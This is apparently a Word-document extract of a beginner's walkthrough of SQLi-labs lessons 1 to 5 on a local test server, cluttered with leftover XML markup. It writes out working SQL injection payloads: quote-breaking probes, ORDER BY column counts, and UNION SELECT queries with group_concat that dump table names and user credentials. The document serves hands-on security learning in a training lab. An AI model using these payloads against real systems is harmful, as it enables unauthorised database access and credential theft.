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WEB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SQLI LABS MASTER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 was able to setup apache,mysql and sqli labs locally using XAMPP and have some prior knowledge in sql.</w:t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LESS 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Getting started with sqli labs using localhost /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http://127.0.0.1:8888/sqli-labs-master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362200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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After setting up the database, i went straight into page-1(Basic Challenges).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There i could find some challenges :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0734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And i started with less 1.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029200" cy="723900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This was what i got there.So, as requested , enter the id parameter with a numeric value in the address bar at the end of the site address, like-</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000F">
      <w:pPr>
        <w:rPr/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http://127.0.0.1:8888/sqli-labs-master/Less-1/?id=1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  then we would get,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3181350" cy="11049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And if ?id-2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3400425" cy="11811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  <w:t xml:space="preserve">So basically , the sql query which was used in the backend was : </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">select username,password from &lt;table_name&gt; where id=&lt; user_input&gt;;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So we have a lot  of usernames and passwords!!! Ok. we have figureout what exactly we have to do to get all the cretendentials together.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According to the challenge we are supposed to give numerical value, lets see what will happen if we give a string.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Then there was nothing, password and username which we got just went off.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When i tried with single quotes then,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ffff00"/>
          <w:highlight w:val="black"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1'' LIMIT 0,1' at line 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Therefore we have lot many single quotes in the query for sql injection.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Now, lets try to get whats there in the database security. we do this by adding a group_concat() command to one of the columns that queries the information_schema data and prints out the table names.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001E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http://127.0.0.1:8888/sqli-labs-master/Less-1/?id=-1’union all select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> [used -1 to invalidate the previous query]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</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1333500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Now similarly lets try to get the column names ,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000022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http://127.0.0.1:8888/sqli-labs-master/Less-1/?id=-1’ union all select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database()--+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7150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Now lets try to dump the columns using;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000027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http://127.0.0.1:8888/sqli-labs-master/Less-1/?id=-1’union all select 1,group_concat(id,username),group_concat(password) from users--+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0700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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There we go… we got the username and passwords!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2830427" cy="297986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0427" cy="2979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LESS 2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When i took the challenge, i got something which was similar to the previous challenge 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438775" cy="1228725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So, lets try by giving a parameter as 1 ti id.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http://127.0.0.1:8888/sqli-labs-master/Less-2/?id=1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67100" cy="1590675"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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We could see both login name and password.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Now , ive tried to figure out something else by giving a ‘ like before.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720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There we go.. We got an error.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Lets try ro get the number of columns now,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Using;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003C">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2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http://127.0.0.1:8888/sqli-labs-master/Less-2/?id=1 order by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It works… for 1,2 and 3.. Lets try with 4.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733800" cy="962025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Basically this challenge is similar to less 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Lets give :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http://127.0.0.1:8888/sqli-labs-master/Less-2/?id=-1</w:t>
        </w:r>
      </w:hyperlink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union all select 1,group_concat(id,username),group_concat(password) from users</w:t>
        </w:r>
      </w:hyperlink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--+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0700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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LESS 3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Lets see the challenge from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http://127.0.0.1:8888/sqli-labs-master/Less-3/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and it will ask us to give a numeric parameter to id. Lets try that first.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3371850" cy="132397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We got our login name and password. Lets try something else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Lets break the sql using a ‘</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000049">
      <w:pPr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http://127.0.0.1:8888/sqli-labs-master/Less-3/?id=1’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45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ffff00"/>
          <w:highlight w:val="black"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ''1'') LIMIT 0,1' at line 1]  </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">so there wa an extra ‘ and a ) also in the syntex and comment out rest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So lets try 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http://127.0.0.1:8888/sqli-labs-master/Less-3/?id=1’)--+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3629025" cy="1257300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  <w:t xml:space="preserve">Sql query is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">select * from users where id=&lt;input_number&gt; LIMIT 0,1;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Now we can use similar query like above to get all usernames and passwords.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Less 4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Lets check for the challenge in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http://127.0.0.1:8888/sqli-labs-master/Less-4/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And like before challenges it also asks for a numeric parameter for id so lets give </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000054">
      <w:pPr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http://127.0.0.1:8888/sqli-labs-master/Less-4/?id=1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> first.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3495675" cy="117157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we get the login name and password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Lets see the possibilities for sql injections as before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Lets try giving a ‘. and it worked without giving any error.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Again lets try with other symbols too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And when it comes to “ . it throws an error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5300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color w:val="ffff00"/>
          <w:highlight w:val="black"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'"1"") LIMIT 0,1' at line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Now lets use “) and comment out rest of the query</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005E">
      <w:pPr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http://127.0.0.1:8888/sqli-labs-master/Less-4/?id=1”) --+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Yup… we got the username and password without errors. Lets dump the db for some other informations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So lets try using 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http://127.0.0.1:8888/sqli-labs-master/Less-4/?id=-1”) union select 1,2,3 from users --+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And we get it. So we can modify it and get the username and password using the address:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000062">
      <w:pPr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http://127.0.0.1:8888/sqli-labs-master/Less-4/?id=-1”) union Select 1,group_concat(1,username),group_concat(password) from  users -- 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07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LESS 5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Lets check the tasks in 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http://127.0.0.1:8888/sqli-labs-master/Less-5/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And it will ask for a numeric parameter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So lets give </w:t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http://127.0.0.1:8888/sqli-labs-master/Less-5/?id=1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And we get a string ‘you are in …’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If we give ?id=1 to 14 we get an output but after that no output.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2790825" cy="11715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If we try with a string , then also no output.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Lets try to break the sql using a ‘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But we get a error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61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127.0.0.1:8888/sqli-labs-master/Less-4/?id=-1%20%22" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1:8888/sqli-labs-master/Less-4/?id=-1%20%22" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1:8888/sqli-labs-master/Less-5/?id=1" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1:8888/sqli-labs-master/Less-5/" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1:8888/sqli-labs-master/Less-2/?id=1" TargetMode="External"/><Relationship Id="rId45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26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1:8888/sqli-labs-master/Less-1/?id=-1" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1:8888/sqli-labs-master/Less-2/?id=-1%20union%20select%201,group_concat(id,username,password),3%20from%20users--+" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1:8888/sqli-labs-master/Less-2/?id=-1%20union%20select%201,group_concat(id,username,password),3%20from%20users--+" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1:8888/sqli-labs-master" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1:8888/sqli-labs-master/Less-3/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1:8888/sqli-labs-master/Less-3/" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1:8888/sqli-labs-master/Less-3/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1:8888/sqli-labs-master/Less-1/?id=1" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1:8888/sqli-labs-master/Less-1/?id=-1" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1:8888/sqli-labs-master/Less-4/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1:8888/sqli-labs-master/Less-1/?id=-1" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1:8888/sqli-labs-master/Less-4/?id=1" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1:8888/sqli-labs-master/Less-1/?id=-1" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1:8888/sqli-labs-master/Less-4/?id=1" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId1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